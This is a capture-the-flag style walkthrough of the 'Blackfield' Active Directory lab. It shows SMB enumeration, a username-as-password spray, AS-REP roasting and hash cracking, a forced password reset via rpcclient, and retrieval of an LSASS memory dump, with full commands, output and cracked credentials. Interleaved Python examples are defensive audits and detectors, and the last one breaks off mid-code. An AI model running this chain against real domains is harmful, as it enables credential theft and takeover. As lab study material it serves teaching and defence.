1. Reconnaissance
1.1. nmap
The scan confirms a Windows Active Directory environment (the host identifies itself as DC01). No particularly suspicious ports were found.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# nmap -sC -sV 10.129.44.77
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-23 15:45 +04
Nmap scan report for 10.129.44.77
Host is up (0.19s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-23 18:45:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn?
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
| date: 2025-12-23T18:46:05
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.21 seconds
1.2. Failed reconnaissance
Reconnaissance with smbmap shows that access is denied.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbmap -H 10.129.44.77
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 10.129.44.77, no fun for you...
[*] Closed 1 connections
1.3. Listing shares with smbclient
The shares were listed. Among them, the profiles$ share stood out.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbclient -N -L //10.129.44.77
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.44.77 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
1.4. Exploring the profiles$ share
Exploring this share reveals a number of folders that look like account names.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbclient //10.129.44.77/profiles$
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 3 20:47:12 2020
.. D 0 Wed Jun 3 20:47:12 2020
AAlleni D 0 Wed Jun 3 20:47:11 2020
ABarteski D 0 Wed Jun 3 20:47:11 2020
ABekesz D 0 Wed Jun 3 20:47:11 2020
ABenzies D 0 Wed Jun 3 20:47:11 2020
ABiemiller D 0 Wed Jun 3 20:47:11 2020
AChampken D 0 Wed Jun 3 20:47:11 2020
ACheretei D 0 Wed Jun 3 20:47:11 2020
[...SNIP...]
Browsing inside, the folders contain nothing. Their only apparent use is to learn account IDs.
smb: \> recurse ON
smb: \> ls
. D 0 Wed Jun 3 20:47:12 2020
.. D 0 Wed Jun 3 20:47:12 2020
AAlleni D 0 Wed Jun 3 20:47:11 2020
ABarteski D 0 Wed Jun 3 20:47:11 2020
ABekesz D 0 Wed Jun 3 20:47:11 2020
ABenzies D 0 Wed Jun 3 20:47:11 2020
ABiemiller D 0 Wed Jun 3 20:47:11 2020
[...SNIP...]
1.5. Creating the users file
Since there are far too many accounts, a command is needed to turn them into a users file in one go. So the share is mounted at /mnt.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# mount -t cifs //10.129.44.77/profiles$ /mnt
Password for root@//10.129.44.77/profiles$:
Next, the contents are saved into the users.old file.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# mv users users.old; ls -1 /mnt/ > users
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# ls
user users users.old
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# cat users.old
AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
[...SNIP...]
1.6. Checking for accounts whose ID and password match
Use nxc to first identify whether any account has a password identical to its username. The AAlleni account was confirmed to have a matching ID/PW.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# nxc smb 10.129.44.77 -u users.old -p users.old --shares
SMB 10.129.44.77 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.44.77 445 DC01 [+] BLACKFIELD.local\AAlleni:AAlleni (Guest)
SMB 10.129.44.77 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
However, there is nothing meaningful that can be done with this account.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# smbclient -L //10.129.44.77/ -U AAlleni%AAlleni
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.44.77 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
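The AAlleni:AAlleni hit above is a password equal to the account name, something the built-in Windows password complexity rule already rejects. The following is an added example (not code from the write-up or from any Microsoft component) that re-implements that rule as a password filter: an account name of three or more characters must not appear in the password, no display-name token longer than two characters may appear, at least three of four character classes must be present, and a configurable minimum length is enforced. The display names used here are constructed.

```python
"""Reject passwords that repeat the account name, modelled on the Windows complexity rule.

Added example, not from the write-up. Display names in the calls below are constructed.
"""
import re
from typing import List

# Delimiters Windows uses to split the display name into tokens.
TOKEN_DELIMS = re.compile(r"[,.\-_ #\t]+")


def display_name_tokens(display_name: str) -> List[str]:
    """Tokens of the display name that are long enough to be checked (3+ characters)."""
    return [t for t in TOKEN_DELIMS.split(display_name) if len(t) > 2]


def contains_account_name(sam_account_name: str, password: str) -> bool:
    """Account names shorter than 3 characters are not checked, as in Windows."""
    return len(sam_account_name) >= 3 and sam_account_name.lower() in password.lower()


def contains_display_name_token(display_name: str, password: str) -> bool:
    pw = password.lower()
    return any(tok.lower() in pw for tok in display_name_tokens(display_name))


def character_classes(password: str) -> int:
    """Count of upper, lower, digit and other (non-alphanumeric) classes present."""
    checks = (str.isupper, str.islower, str.isdigit, lambda c: not c.isalnum())
    return sum(1 for check in checks if any(check(c) for c in password))


def password_problems(sam_account_name: str, display_name: str, password: str,
                      min_length: int = 14) -> List[str]:
    """Empty list means the password passes; otherwise each violated rule is named."""
    problems = []
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    if contains_account_name(sam_account_name, password):
        problems.append("contains the account name")
    if contains_display_name_token(display_name, password):
        problems.append("contains part of the display name")
    if character_classes(password) < 3:
        problems.append("fewer than 3 character classes")
    return problems


if __name__ == "__main__":
    # The finding from the write-up: username used as the password.
    print(password_problems("AAlleni", "Alice Alleni", "AAlleni"))
    print(password_problems("support", "Support Desk", "Winter-Gardens-Bloom-2025!"))
```

A password spray like the nxc run above only succeeds because such passwords exist; enforcing this filter (or the equivalent domain policy) removes the class of finding rather than one instance of it.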
1.7. Checking access possibilities with GetNPUsers
With only usernames there is little to work with, so they are checked with GetNPUsers. Among them, the support account returned a hash.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# impacket-GetNPUsers 'BLACKFIELD.LOCAL/' -usersfile users.old -outputfile hash -dc-ip 10.129.44.77
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...SNIP...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$support@BLACKFIELD.LOCAL:6534edc8a88337a1d278499bd271450a$fdae867559c60e8d7d5f6c84775a9dc2374ded18870f64bfd6d8dae2c26753137d041e698a029bcc63db045eda4a864a973f240788e4d9d6172cc09aba3d49353d319e4b46d03cfcadc657888a6ae157daa16c9bc4e37bef610904f131d45b7ad01fae2e895ece77a199ad4ded9d76a71a15eca28dca5795bc4820c4a3bcfbaffb00602cee258086738e81f4de3c9706b5966e07fb18d40c2ce52f1f819c8279e91330de5c10dc6c00a98b0eb8cdc76270e7377ca5136b3a739b2006624c0a8d0f8308f081b55128ee39d72fef1ecd6421297573ef4ce0cdc9700eee017fe593eb034091005602b4b7f5d9bb0264f7e5b0e95aca
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...SNIP...]
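GetNPUsers only receives an AS-REP for accounts whose userAccountControl has UF_DONT_REQUIRE_PREAUTH (0x400000) set, which is why the output above says that svc_backup "doesn't have UF_DONT_REQUIRE_PREAUTH set". The following is an added example (not code from the write-up or from Impacket) that decodes that bitmask the way a defender reviewing an LDAP export would and lists the enabled accounts exposed this way. The account values are constructed, not read from the lab domain.

```python
"""Audit userAccountControl for accounts that do not require Kerberos pre-authentication.

Added example, not from the write-up. Sample account values are constructed.
"""
from typing import Dict, List, Tuple

# Well-known userAccountControl bits (ADS_USER_FLAG_ENUM); only the ones relevant here.
UAC_FLAGS: Dict[int, str] = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQUIRE_PREAUTH",
}
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Equivalent LDAP filter for the same finding (bitwise-AND matching rule; 4194304 == 0x400000):
#   (&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))


def decode_uac(value: int) -> List[str]:
    """Names of the set flags, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def preauth_disabled(value: int) -> bool:
    return bool(value & UF_DONT_REQUIRE_PREAUTH)


def audit_preauth(accounts: Dict[str, int]) -> List[Tuple[str, List[str]]]:
    """Enabled accounts with pre-auth disabled, with their decoded flags.

    Disabled accounts are skipped: the KDC refuses them (KDC_ERR_CLIENT_REVOKED),
    so no AS-REP can be obtained for them.
    """
    findings = []
    for name, uac in accounts.items():
        if uac & UF_ACCOUNTDISABLE:
            continue
        if preauth_disabled(uac):
            findings.append((name, decode_uac(uac)))
    return findings


# Constructed sample: 'support' modelled as pre-auth disabled, 'svc_backup' as normal.
SAMPLE_ACCOUNTS: Dict[str, int] = {
    "support": 0x400200,     # NORMAL_ACCOUNT | DONT_REQUIRE_PREAUTH
    "svc_backup": 0x10200,   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    "old_vendor": 0x400202,  # disabled as well, so not a live exposure
}

if __name__ == "__main__":
    for name, flags in audit_preauth(SAMPLE_ACCOUNTS):
        print(f"{name}: {' | '.join(flags)}")
```

The remediation is to clear the flag (the "Do not require Kerberos preauthentication" account option); the KDC then demands an encrypted timestamp before issuing the AS-REP, and the offline guessing shown in the next step is no longer possible against that account.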
Cracking this hash yielded the password #00^BlackKnight.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
[...SNIP...]
$krb5asrep$23$support@BLACKFIELD.LOCAL:6534edc8a88337a1d278499bd271450a$fdae867559c60e8d7d5f6c84775a9dc2374ded18870f64bfd6d8dae2c26753137d041e698a029bcc63db045eda4a864a973f240788e4d9d6172cc09aba3d49353d319e4b46d03cfcadc657888a6ae157daa16c9bc4e37bef610904f131d45b7ad01fae2e895ece77a199ad4ded9d76a71a15eca28dca5795bc4820c4a3bcfbaffb00602cee258086738e81f4de3c9706b5966e07fb18d40c2ce52f1f819c8279e91330de5c10dc6c00a98b0eb8cdc76270e7377ca5136b3a739b2006624c0a8d0f8308f081b55128ee39d72fef1ecd6421297573ef4ce0cdc9700eee017fe593eb034091005602b4b7f5d9bb0264f7e5b0e95aca:#00^BlackKnight
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:6534edc8a883...e95aca
Time.Started.....: Wed Dec 24 08:58:18 2025 (5 secs)
Time.Estimated...: Wed Dec 24 08:58:23 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3216.6 kH/s (0.50ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14336000/14344385 (99.94%)
Rejected.........: 0/14336000 (0.00%)
Restore.Point....: 14333952/14344385 (99.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: #1crapper -> #!hrvert
Hardware.Mon.#1..: Util: 84%
[...SNIP...]
The shares were checked again over SMB with this account, but nothing noteworthy turned up.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# nxc smb 10.129.44.77 -u support -p '#00^BlackKnight' --shares
SMB 10.129.44.77 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.44.77 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.129.44.77 445 DC01 [*] Enumerated shares
SMB 10.129.44.77 445 DC01 Share Permissions Remark
SMB 10.129.44.77 445 DC01 ----- ----------- ------
SMB 10.129.44.77 445 DC01 ADMIN$ Remote Admin
SMB 10.129.44.77 445 DC01 C$ Default share
SMB 10.129.44.77 445 DC01 forensic Forensic / Audit share.
SMB 10.129.44.77 445 DC01 IPC$ READ Remote IPC
SMB 10.129.44.77 445 DC01 NETLOGON READ Logon server share
SMB 10.129.44.77 445 DC01 profiles$ READ
SMB 10.129.44.77 445 DC01 SYSVOL READ Logon server share
2. Internal network penetration
2.1. Identifying a suspicious account
Querying LDAP with nxc, an account named audit2020 has a BadPW value of 3, that is, a record of three failed password attempts. This account looks somewhat suspicious.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# nxc ldap 10.129.44.77 -u support -p '#00^BlackKnight' --users
LDAP 10.129.44.77 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP 10.129.44.77 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
LDAP 10.129.44.77 389 DC01 [*] Enumerated 315 domain users: BLACKFIELD.local
LDAP 10.129.44.77 389 DC01 -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.44.77 389 DC01 Administrator 2020-02-23 22:09:53 0 Built-in account for administering the computer/domain
LDAP 10.129.44.77 389 DC01 Guest 2020-06-03 20:18:28 0 Built-in account for guest access to the computer/domain
LDAP 10.129.44.77 389 DC01 krbtgt 2020-02-23 22:08:31 0 Key Distribution Center Service Account
LDAP 10.129.44.77 389 DC01 audit2020 2020-09-22 02:35:06 3
LDAP 10.129.44.77 389 DC01 support 2020-02-23 21:53:23 0
[...SNIP...]
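The nxc output above is only useful once it is turned into records. The following is an added example (not code from the write-up or from nxc) that parses the lines exactly as printed (host, port, DC name, username, pwdLastSet, badPwdCount, description) and reports what a defender looks for in the same data: accounts with a non-zero bad-password counter and accounts whose password is older than a chosen threshold. The sample is the output shown above plus one constructed line with a never-set password.

```python
"""Parse the nxc 'ldap --users' table and flag bad-password counts and stale passwords.

Added example, not from the write-up. Sample text is copied from the output above
plus one constructed '<never>' line.
"""
import re
from datetime import date, datetime
from typing import Dict, List, Optional, Tuple, Union

# One user line as nxc prints it; pwdLastSet is '<never>' when it was never set.
USER_LINE = re.compile(
    r"^LDAP\s+(?P<host>\S+)\s+(?P<port>\d+)\s+(?P<dc>\S+)\s+(?P<user>\S+)\s+"
    r"(?P<pwset>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}|<never>)\s+(?P<bad>\d+)\s*(?P<desc>.*)$"
)

Record = Dict[str, object]


def parse_nxc_ldap_users(text: str) -> List[Record]:
    """One record per user line; banner, header and [*]/[+] status lines are skipped."""
    records: List[Record] = []
    for line in text.splitlines():
        m = USER_LINE.match(line.strip())
        if not m:
            continue
        pwset = None if m["pwset"] == "<never>" else datetime.strptime(m["pwset"], "%Y-%m-%d %H:%M:%S")
        records.append({
            "user": m["user"],
            "pwd_last_set": pwset,
            "bad_pwd_count": int(m["bad"]),
            "description": m["desc"].strip(),
        })
    return records


def flag_bad_password_counts(records: List[Record], threshold: int = 1) -> List[Tuple[str, int]]:
    """Accounts whose badPwdCount is at or above threshold, highest count first."""
    hits = [(str(r["user"]), int(r["bad_pwd_count"])) for r in records if int(r["bad_pwd_count"]) >= threshold]
    return sorted(hits, key=lambda h: (-h[1], h[0]))


def password_age_days(record: Record, as_of: Union[date, str]) -> Optional[int]:
    """Days since pwdLastSet as of the given date (ISO string accepted); None if never set."""
    if isinstance(as_of, str):
        as_of = date.fromisoformat(as_of)
    last_set = record["pwd_last_set"]
    if last_set is None:
        return None
    return (as_of - last_set.date()).days  # type: ignore[union-attr]


def stale_passwords(records: List[Record], as_of: Union[date, str], max_age_days: int) -> List[str]:
    """Users whose password is older than max_age_days; never-set passwords are included."""
    stale = []
    for r in records:
        age = password_age_days(r, as_of)
        if age is None or age > max_age_days:
            stale.append(str(r["user"]))
    return stale


# Lines copied from the nxc output above, plus one constructed '<never>' line at the end.
SAMPLE_OUTPUT = """\
LDAP 10.129.44.77 389 DC01 [*] Enumerated 315 domain users: BLACKFIELD.local
LDAP 10.129.44.77 389 DC01 -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.44.77 389 DC01 Administrator 2020-02-23 22:09:53 0 Built-in account for administering the computer/domain
LDAP 10.129.44.77 389 DC01 Guest 2020-06-03 20:18:28 0 Built-in account for guest access to the computer/domain
LDAP 10.129.44.77 389 DC01 krbtgt 2020-02-23 22:08:31 0 Key Distribution Center Service Account
LDAP 10.129.44.77 389 DC01 audit2020 2020-09-22 02:35:06 3
LDAP 10.129.44.77 389 DC01 support 2020-02-23 21:53:23 0
LDAP 10.129.44.77 389 DC01 tmp_contractor <never> 0 constructed sample account
"""

if __name__ == "__main__":
    recs = parse_nxc_ldap_users(SAMPLE_OUTPUT)
    print(flag_bad_password_counts(recs))
    print(stale_passwords(recs, "2025-12-23", max_age_days=365))
```

A non-zero badPwdCount on an otherwise idle account is the same signal a SOC would alert on: someone guessing at it. Password age is the second thing worth reading off this table, since every password here is years old.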
2.2. Mapping internal relationships with BloodHound
AD information is collected with bloodhound-python.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.129.44.77
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.blackfield.local:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
[...SNIP...]
The audit2020 account was already flagged as suspicious, and the account currently in hand, support, holds a ForceChangePassword right over it. In other words, the support account can forcibly change the password of the audit2020 account.

2.3. Changing the audit2020 account's password with rpcclient
The password can be changed with the setuserinfo2 command supported by rpcclient. I don't know why the 23 option is used.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# rpcclient -U "support"%"#00^BlackKnight" 10.129.44.77
rpcclient $> 10.129.44.77
command not found: 10.129.44.77
rpcclient $> setuserinfo2
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 audit2020 23 'test123!'
rpcclient $>
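The setuserinfo2 call above is a password reset of another principal, and a domain controller records exactly that in the Security log as event 4724 ("An attempt was made to reset an account's password"), with the caller in SubjectUserName and the affected account in TargetUserName; event 4723 is a user changing their own password and is normally benign. The following is an added example (not code from the write-up or from any product) of the detection logic: it reports 4724 events whose caller is not an approved resetter, and callers that reset several different accounts within a short window. The event records are constructed dicts shaped like those EventData fields.

```python
"""Detect password resets of other accounts by callers who should not be performing them.

Added example, not from the write-up. The events below are constructed.
"""
from datetime import datetime
from typing import Dict, List, Set, Tuple

EVENT_RESET_OTHER = 4724  # "An attempt was made to reset an account's password"
EVENT_CHANGE_OWN = 4723   # "An attempt was made to change an account's password"

# Constructed events modelled on the EventData fields of the real Security log entries.
CONSTRUCTED_EVENTS: List[Dict[str, object]] = [
    {"EventID": EVENT_CHANGE_OWN, "TimeCreated": "2025-12-24T09:01:10Z",
     "SubjectUserName": "ABekesz", "TargetUserName": "ABekesz"},
    {"EventID": EVENT_RESET_OTHER, "TimeCreated": "2025-12-24T09:05:42Z",
     "SubjectUserName": "helpdesk01", "TargetUserName": "AAlleni"},
    {"EventID": EVENT_RESET_OTHER, "TimeCreated": "2025-12-24T09:12:07Z",
     "SubjectUserName": "support", "TargetUserName": "audit2020"},
    {"EventID": EVENT_RESET_OTHER, "TimeCreated": "2025-12-24T09:12:09Z",
     "SubjectUserName": "support", "TargetUserName": "svc_backup"},
]


def _ts(ev: Dict[str, object]) -> datetime:
    return datetime.strptime(str(ev["TimeCreated"]), "%Y-%m-%dT%H:%M:%SZ")


def unauthorized_resets(events: List[Dict[str, object]],
                        authorized_resetters: Set[str]) -> List[Tuple[str, str, str]]:
    """(time, subject, target) for every 4724 whose caller is not an authorized resetter.

    Self-resets and 4723 own-password changes are not reported.
    """
    allowed = {a.lower() for a in authorized_resetters}
    hits = []
    for ev in events:
        if ev["EventID"] != EVENT_RESET_OTHER:
            continue
        subject, target = str(ev["SubjectUserName"]), str(ev["TargetUserName"])
        if subject.lower() in allowed or subject.lower() == target.lower():
            continue
        hits.append((str(ev["TimeCreated"]), subject, target))
    return hits


def reset_bursts(events: List[Dict[str, object]], window_seconds: int = 300,
                 min_targets: int = 2) -> List[Tuple[str, List[str]]]:
    """Callers that reset at least min_targets distinct accounts within window_seconds."""
    by_subject: Dict[str, List[Dict[str, object]]] = {}
    for ev in events:
        if ev["EventID"] == EVENT_RESET_OTHER:
            by_subject.setdefault(str(ev["SubjectUserName"]), []).append(ev)
    bursts = []
    for subject, evs in by_subject.items():
        evs.sort(key=_ts)
        for i, first in enumerate(evs):
            targets: List[str] = []
            for ev in evs[i:]:
                if (_ts(ev) - _ts(first)).total_seconds() > window_seconds:
                    break
                if ev["TargetUserName"] not in targets:
                    targets.append(str(ev["TargetUserName"]))
            if len(targets) >= min_targets:
                bursts.append((subject, targets))
                break
    return bursts


if __name__ == "__main__":
    print(unauthorized_resets(CONSTRUCTED_EVENTS, {"helpdesk01"}))
    print(reset_bursts(CONSTRUCTED_EVENTS))
```

The allow-list is the set of principals that are supposed to hold ForceChangePassword (helpdesk roles); any other subject appearing in a 4724 is either a misconfigured ACL, as here, or an abuse of one. Reviewing who holds that right in the first place, which is what the BloodHound step surfaced, is the preventive half of the same control.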
With the audit2020 account and its newly set password, the shares are checked with smbmap.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbmap -H 10.129.44.77 -u audit2020 -p 'test123!'
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.129.44.77:445 Name: 10.129.44.77 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share
[*] Closed 1 connections
2.4. Collecting internal data from the shares
Having confirmed READ permission on the forensic share, its contents are examined. Inside the commands_output folder, domain_admins.txt catches the eye.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbclient //10.129.44.77/forensic -U audit2020%test123!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 17:03:16 2020
.. D 0 Sun Feb 23 17:03:16 2020
commands_output D 0 Sun Feb 23 22:14:37 2020
memory_analysis D 0 Fri May 29 00:28:33 2020
tools D 0 Sun Feb 23 17:39:08 2020
5102079 blocks of size 4096. 1671250 blocks available
smb: \> recurse ON
smb: \> ls
. D 0 Sun Feb 23 17:03:16 2020
.. D 0 Sun Feb 23 17:03:16 2020
commands_output D 0 Sun Feb 23 22:14:37 2020
memory_analysis D 0 Fri May 29 00:28:33 2020
tools D 0 Sun Feb 23 17:39:08 2020
\commands_output
. D 0 Sun Feb 23 22:14:37 2020
.. D 0 Sun Feb 23 22:14:37 2020
domain_admins.txt A 528 Sun Feb 23 17:00:19 2020
domain_groups.txt A 962 Sun Feb 23 16:51:52 2020
domain_users.txt A 16454 Sat Feb 29 02:32:17 2020
firewall_rules.txt A 518202 Sun Feb 23 16:53:58 2020
ipconfig.txt A 1782 Sun Feb 23 16:50:28 2020
netstat.txt A 3842 Sun Feb 23 16:51:01 2020
route.txt A 3976 Sun Feb 23 16:53:01 2020
systeminfo.txt A 4550 Sun Feb 23 16:56:59 2020
tasklist.txt A 9990 Sun Feb 23 16:54:29 2020
[...SNIP...]
Looking at this file, there is something that looks like a credential for administrator, but it is of little use.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# cat domain_admins.txt
��Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator Ipwn3dYourCompany
The command completed successfully.
Another file, lsass.zip in the memory_analysis folder, could also be collected. It is a full memory dump of LSASS, from which material such as NTLM hashes can be obtained. Downloading it with smbclient broke off midway because the file is too large, so the share was mounted and the file copied from the mount instead.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# mount -t cifs //10.129.44.77/forensic /mnt/ -o user=audit2020,password='test123!'
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# cp /mnt/memory_analysis/lsass.zip /home/kali/labs/Blackfield/
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
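The real finding in this section is that a share readable by an ordinary domain account holds a process dump and an export of the Domain Admins group. The following is an added example (not code from the write-up or from smbclient) of the audit a defender would run over their own shares: it parses "recurse ON" + "ls" output as printed above (a "\dir" header line, then "name ATTRS size date" entries) into full paths and flags file names that usually carry secrets. The listing is assembled from the entries shown above plus a constructed memory_analysis directory; the lsass.zip size is made up.

```python
"""Flag credential-bearing artefacts in an smbclient recursive listing.

Added example, not from the write-up. The listing is partly constructed (see SAMPLE_LISTING).
"""
import re
from typing import List, Tuple

# 'name ATTRS size Www Mmm dd HH:MM:SS yyyy' as smbclient prints it.
ENTRY = re.compile(
    r"^(?P<name>.+?)\s+(?P<attrs>[A-Z]+)\s+(?P<size>\d+)\s+"
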